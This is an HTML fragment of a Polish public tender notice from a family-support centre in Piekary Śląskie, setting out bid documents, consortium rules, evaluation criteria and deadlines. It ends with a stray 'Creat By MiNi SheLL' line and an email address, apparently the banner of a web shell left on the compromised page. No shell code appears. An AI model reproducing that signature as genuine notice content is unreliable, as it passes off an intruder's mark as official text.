<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pozostałe wymagane dokumenty:
a) wypełniony i podpisany formularz Oferty wg wzoru stanowiącego Załącznik nr 1 do SIWZ,
b) pełnomocnictwo do reprezentowania Wykonawcy, jeżeli ofertę podpisuje osoba nie wymieniona w dokumencie określającym status prawny Wykonawcy. Pełnomocnictwo powinno być w formie oryginału lub kopii notarialnie poświadczonej za zgodność z oryginałem.

2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania jednej oferty, przez dwa lub więcej podmioty np. konsorcjum firm, spółkę cywilną), pod warunkiem, że spełnią warunki udziału w postępowaniu określone      w Rozdziale VII niniejszej SIWZ oraz złożą dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w Rozdziale VIII SIWZ,  
b) Wykonawcy w myśl art. 23 ust. 2 ustawy Pzp, ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, 
c) w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w Rozdziale VIII ust. 2 i 3 SIWZ przez każdego z nich lub przez Pełnomocnika w imieniu każdego z nich, 
d) dokumenty wymienione w Rozdziale VIII ust.1 pkt. b), c), d) SIWZ Wykonawcy składają wspólnie,
e) oświadczenie wymienione w Rozdziale VIII ust.1 pkt a) SIWZ stanowiące Załącznik nr 2 do SIWZ składają wszyscy Wykonawcy wspólnie na jednym druku lub Pełnomocnik w imieniu wszystkich, 
f) formularz Oferty wymieniony w Rozdziale VIII ust. 4 pkt a) SIWZ winien być podpisany przez uprawnionych przedstawicieli Wykonawców, 
g) wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem (liderem) konsorcjum,
h) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów na zasobach których polega Wykonawca, o których mowa w art. 26 ust. 2b ustawy Pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów powinny być poświadczone za zgodność z oryginałem przez Wykonawców lub te podmioty,
i) w przypadku wyboru najkorzystniejszej oferty złożonej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego przed podpisaniem umowy konieczne jest przedłożenie umowy konsorcjum (Wykonawców występujących wspólnie), która będzie regulować wzajemną współpracę Wykonawców, zawierającą w swej treści postanowienia dotyczące m.in. realizacji poszczególnych części zamówienia, sposobu dokonywania rozliczeń. Zgodnie z treścią art. 141 ustawy Pzp Wykonawcy ubiegający się wspólnie o udzielenie zamówienia  ponoszą solidarną odpowiedzialność za wykonanie umowy,
j) w przypadku, gdy z załączonych do oferty dokumentów nie wynika sposób reprezentacji Wykonawcy,  przed podpisaniem umowy, Zamawiający wymaga przedłożenia dokumentu (pełnomocnictwa) z którego wynika uprawnienie osoby lub osób do składania oświadczeń woli i reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Zasoby kadrowe - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Prawo zamówień publicznych, zmiany postanowień umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy są dopuszczone wyłącznie w zakresie:
a) w przypadku zmiany wysokości stawek podatku VAT dotyczących przedmiotu umowy podlegają one zmianie od dnia wejścia w życie nowych stawek podatku, przy czym zmianie ulegnie wyłącznie kwota brutto, cena netto pozostanie bez zmian;
b) gdy nastąpi konieczność zmiany osób wykonujących zamówienie z następujących powodów:
-   śmierci, choroby lub innych zdarzeń losowych osób wykonujących zamówienie;
-   niewywiązywania się osób wykonujących zamówienie z obowiązków wynikających  z powierzonych im zadań;
-  jeżeli zmiana osoby wykonującej zamówienie stanie się konieczna z jakichkolwiek
    przyczyn niezależnych od Wykonawcy (np. rezygnacji).
2.   Zmiana jest możliwa jedynie na nowe osoby o kwalifikacjach i doświadczeniu nie niższychniż zaproponowane przez Wykonawcę w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Piekarach Śląskich ul. Bpa Nankera 103, codziennie w godz. od 8:00 do 15:00 w Dziale Administracyjno - Gospodarczym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2015 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Rodzinie w Piekarach Śląskich ul. Bpa Nankera 103 (sekretariat pokój nr 19, piętro I).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com